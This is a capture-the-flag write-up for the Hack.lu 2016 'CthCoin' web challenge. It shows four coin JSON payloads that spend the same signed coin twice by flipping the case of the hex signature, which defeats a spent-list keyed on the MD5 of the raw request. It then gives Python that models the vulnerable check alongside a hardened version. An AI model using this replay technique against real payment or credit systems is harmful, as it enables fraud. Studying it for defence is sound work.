CthCoin(web100) – Hacklu2016

This challenge is so easy.
Firstly, it gives me a basic site with several pages: Index, Shop, Profile, Wallet.
When we open Shop, it shows a list of products to purchase (including the flag), but we don't have enough money to buy it. So I guess this is where we should attack.
There is something in robots.txt.
The hidden entry looks promising, so let's take a look at the link "/debugcoins".


And there are some hints "behind the screen":


So I guess the server-side code looks something like this (my guess, not the real source):

function Check_Money(coin):
    check (AM)
    check (CU)
    check (MN)
    check (NC)
    check (OW)
    check (PK)
    check (TS)
    check (SIG)          // signature over the fields above, given as hex, so case does not matter
function Check_If_exist(coin):
    hash = md5($_POST['coin'])      // hash of the raw submitted JSON, exactly as posted
    if not file_get_contents("debug_file").find(hash):
        file_put_contents("debug_file", hash, FILE_APPEND)
        Coin += AM
Check_Money(coin)
Check_If_exist(coin)

To attack in this case, the idea is to make different MD5 hashes for the same coin and the same signature. The SIG field is hex, and hex decoding is case-insensitive, so uppercasing it keeps the signature valid while changing the hash of the posted JSON. So I decide to submit 4 times (each coin once in lowercase and once in uppercase):
First:
{"AM": "50", "CU": "NIST384", "MN": "F9BEB4E1", "NC": "066050", "OW": "joker1", "PK": "b6bd0e420b4984854d916c30108d685e70617434f2d3d82a04a9f92ff20719f74ef79d9a6825fddef8460d6d4833d2ac1e5627d52ec916223a8e051cab16b49a621e6501bf05bdee99dd1f44192876d08e1b413b7cd12d1be88e97eb6a6e1ddb", "SIG": "1922b39b231e6b1af63ceb366953941d8eb969836852f18834f198c65aa70728b86d2674b40f157637876330fa5dcfe688c6923e512bbf6e15b3c9c4633ef580f53451148d66e185d201ecd1f0a0275d0ff9cbea54bc21dfa008d877c9fa4f6f", "TS": "1477311236"}

Second:
{"AM": "50", "CU": "NIST384", "MN": "F9BEB4E1", "NC": "066050", "OW": "joker1", "PK": "b6bd0e420b4984854d916c30108d685e70617434f2d3d82a04a9f92ff20719f74ef79d9a6825fddef8460d6d4833d2ac1e5627d52ec916223a8e051cab16b49a621e6501bf05bdee99dd1f44192876d08e1b413b7cd12d1be88e97eb6a6e1ddb", "SIG": "1922B39B231E6B1AF63CEB366953941D8EB969836852F18834F198C65AA70728B86D2674B40F157637876330FA5DCFE688C6923E512BBF6E15B3C9C4633EF580F53451148D66E185D201ECD1F0A0275D0FF9CBEA54BC21DFA008D877C9FA4F6F", "TS": "1477311236"}

Third:
{"AM": "10", "CU": "NIST384", "MN": "F9BEB4E1", "NC": "342152", "OW": "joker1", "PK": "b6bd0e420b4984854d916c30108d685e70617434f2d3d82a04a9f92ff20719f74ef79d9a6825fddef8460d6d4833d2ac1e5627d52ec916223a8e051cab16b49a621e6501bf05bdee99dd1f44192876d08e1b413b7cd12d1be88e97eb6a6e1ddb", "SIG": "b4517a7023fdc76bd80074c16fd77d425222ba80a6c12fd4caf328e115ef29a0a3f6e0644b11544cdb2828a3e4061a75446bc6241170c09a8c52c02cd1f03cab6718e3c5854d5faa15963a25171f7264225dbf4a5ead11e55c75dfa98fe30107", "TS": "1477311236"}

Fourth:
{"AM": "10", "CU": "NIST384", "MN": "F9BEB4E1", "NC": "342152", "OW": "joker1", "PK": "b6bd0e420b4984854d916c30108d685e70617434f2d3d82a04a9f92ff20719f74ef79d9a6825fddef8460d6d4833d2ac1e5627d52ec916223a8e051cab16b49a621e6501bf05bdee99dd1f44192876d08e1b413b7cd12d1be88e97eb6a6e1ddb", "SIG": "B4517A7023FDC76BD80074C16FD77D425222BA80A6C12FD4CAF328E115EF29A0A3F6E0644B11544CDB2828A3E4061A75446BC6241170C09A8C52C02CD1F03CAB6718E3C5854D5FAA15963A25171F7264225DBF4A5EAD11E55C75DFA98FE30107", "TS": "1477311236"}

and get the flag.
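To make the bug concrete, here is an added example (my own code, not the challenge's source) that models the guessed server logic and runs the case trick against it. It substitutes HMAC-SHA384 with a constructed key for the challenge's NIST P-384 signature so it runs with the standard library only; the flaw does not depend on the signature scheme. The coin values, the `VulnerableWallet`/`FixedWallet` names and the `debug_file` set are assumptions for illustration.

```python
import hashlib
import hmac
import json

# Constructed stand-in for the mint's signing key. The real challenge signs coins
# with NIST P-384 (the CU field); HMAC-SHA384 is substituted so this runs offline.
MINT_KEY = b"constructed-mint-secret-not-from-the-challenge"

SIGNED_FIELDS = ("AM", "CU", "MN", "NC", "OW", "PK", "TS")


def signing_input(coin):
    """Canonical bytes the signature covers: the field values, not their JSON encoding."""
    return "|".join(f"{k}={coin[k]}" for k in SIGNED_FIELDS).encode()


def mint(fields):
    """Issue a coin: attach a lowercase hex signature over the signed fields."""
    coin = dict(fields)
    coin["SIG"] = hmac.new(MINT_KEY, signing_input(coin), hashlib.sha384).hexdigest()
    return coin


def signature_valid(coin):
    """Verify SIG. bytes.fromhex() accepts either case, like any hex decoder,
    so 'ABCD' and 'abcd' decode to the same signature bytes."""
    try:
        given = bytes.fromhex(coin["SIG"])
    except (KeyError, ValueError):
        return False
    expected = hmac.new(MINT_KEY, signing_input(coin), hashlib.sha384).digest()
    return hmac.compare_digest(given, expected)


class VulnerableWallet:
    """Guessed server logic: spent coins are remembered by md5 of the raw POST body."""

    def __init__(self):
        self.debug_file = set()   # stands in for the md5 list kept in "debug_file"
        self.balance = 0

    def redeem(self, raw_body):
        coin = json.loads(raw_body)
        if not signature_valid(coin):
            return False
        h = hashlib.md5(raw_body.encode()).hexdigest()
        if h in self.debug_file:
            return False           # only looks spent if the bytes match exactly
        self.debug_file.add(h)
        self.balance += int(coin["AM"])
        return True


class FixedWallet:
    """Hardened version: remember coins by what the signature actually covers."""

    def __init__(self):
        self.spent = set()
        self.balance = 0

    def redeem(self, raw_body):
        coin = json.loads(raw_body)
        if not signature_valid(coin):
            return False
        key = hashlib.sha256(signing_input(coin)).digest()
        if key in self.spent:
            return False           # same coin, however it was encoded on the wire
        self.spent.add(key)
        self.balance += int(coin["AM"])
        return True


def case_variants(raw_body):
    """The writeup's trick: the same coin posted with SIG in lowercase and in uppercase."""
    coin = json.loads(raw_body)
    variants = []
    for recase in (str.lower, str.upper):
        c = dict(coin)
        c["SIG"] = recase(coin["SIG"])
        variants.append(json.dumps(c, sort_keys=True))
    return variants


def demo():
    # Constructed coin using the field layout from the writeup; PK is a dummy value.
    coin = mint({"AM": "50", "CU": "NIST384", "MN": "F9BEB4E1", "NC": "066050",
                 "OW": "joker1", "PK": "ab" * 96, "TS": "1477311236"})
    raw = json.dumps(coin, sort_keys=True)
    vuln, fixed = VulnerableWallet(), FixedWallet()
    vuln_results = [vuln.redeem(body) for body in case_variants(raw)]
    fixed_results = [fixed.redeem(body) for body in case_variants(raw)]
    return vuln.balance, fixed.balance, vuln_results, fixed_results


if __name__ == "__main__":
    print(demo())   # (100, 50, [True, True], [True, False])
```

The vulnerable wallet credits the 50-coin twice because the two bodies differ in one byte of case, so their MD5s differ, while the decoded signature is identical. The same check falls to any other byte-level re-encoding of the JSON (extra whitespace, a different key order), which is why the fix keys the spent-list on the canonical signed content rather than on the raw request bytes.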
